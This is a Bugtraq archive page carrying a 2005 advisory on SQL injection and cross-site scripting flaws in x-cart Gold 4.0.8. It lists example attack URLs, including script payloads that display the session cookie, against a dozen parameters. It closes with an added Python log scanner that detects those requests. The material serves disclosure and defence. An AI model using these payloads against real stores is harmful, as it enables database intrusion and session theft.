
Bugtraq mailing list archives

Multiple vulnerabilities in x-cart Gold
From: CENSORED <censored () mail ru>
Date: 31 May 2005 03:38:16 -0000



SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              Title: Multiple vulnerabilities in x-cart Gold
            Program: x-cart Gold
 Vulnerable version: 4.0.8
           Homepage: www.x-cart.com
         Date found: 29.05.05
           Found by: CENSORED / SVT / www.svt.nukleon.us
===================================================================== 
The description. 
 
SQL injections
---------------
During research of the product, multiple SQL injection vulnerabilities
were found. The vulnerability affects practically all parameters.
The first flaw was found in the "cat" parameter. The script does not
check this parameter, and substituting the "'" character makes SQL
injection possible. The next flaw was found in the "productid"
parameter: because special characters are not checked, passing the "'"
character to this parameter causes an SQL error, and the script
automatically redirects to the error page. On that page the "id"
parameter is visible; passing the "'" character to it also makes SQL
injection possible. Next is the "mode" parameter: substituting special
characters causes an error, and SQL injection is possible. Finally,
SQL injection is also possible in the "section" parameter.

XSS 
--------------- 
XSS vulnerabilities can be triggered in the same parameters as the
SQL injection flaws.
=====================================================================
Example
^^^^^^^^^
SQL injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
=====================================================================


The conclusion. 
^^^^^^^^^^^ 
Research was done only on version 4.0.8. Other versions may also
be vulnerable. The vendor has been notified. If you have
any remarks, write to censored () mail ru
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
                                          ___
                                ___      /  /
                    ____________\__\___ /  /
                   |   _______________// _/_
               ____|__________   |\  \/ |   |
              /__________________| \____/   |
                                     ___|   |___
                                    |___     ___|
                                        |   |___
                                        |_______|
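
A defender-side check built from the advisory's example URLs, as an added example (not part of the original advisory or of X-Cart): it scans web-server access-log lines for the listed scripts and parameters carrying quote or markup characters. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters named in the advisory's example URLs.
ADVISORY_PARAMS = {
    "home.php": {"cat", "printable"},
    "product.php": {"productid", "mode"},
    "error_message.php": {"id"},
    "help.php": {"section"},
    "orders.php": {"mode"},
    "register.php": {"mode"},
    "search.php": {"mode"},
    "giftcert.php": {"gcid", "gcindex"},
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters the advisory's probes rely on: a quote (SQL) or markup (XSS).
SUSPICIOUS_RE = re.compile(r"['\"<>]")

def scan_line(line):
    """Return [(script, param, value)] for advisory parameters that carry
    quote or markup characters in one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    watched = ADVISORY_PARAMS.get(script)
    if not watched:
        return []
    hits = []
    # parse_qsl percent-decodes, so %27 and a literal ' are treated alike.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in watched and SUSPICIOUS_RE.search(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    return [hit for line in lines for hit in scan_line(line)]

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2005:04:00:01 +0000] "GET /home.php?cat=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/May/2005:04:00:07 +0000] "GET /product.php?productid=%27 HTTP/1.1" 302 0',
    '192.0.2.44 - - [31/May/2005:04:00:09 +0000] "GET /error_message.php?access_denied&id=%27 HTTP/1.1" 200 900',
    '192.0.2.44 - - [31/May/2005:04:00:15 +0000] "GET /help.php?section=%27%3E%3Cscript%3E HTTP/1.1" 200 800',
    '192.0.2.10 - - [31/May/2005:04:01:00 +0000] "GET /search.php?mode=search&q=it%27s HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"{script}: {param}={value!r}")
```

The last sample line is deliberately left unflagged: its apostrophe sits in a parameter the advisory does not list, so only the named script and parameter pairs are reported.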

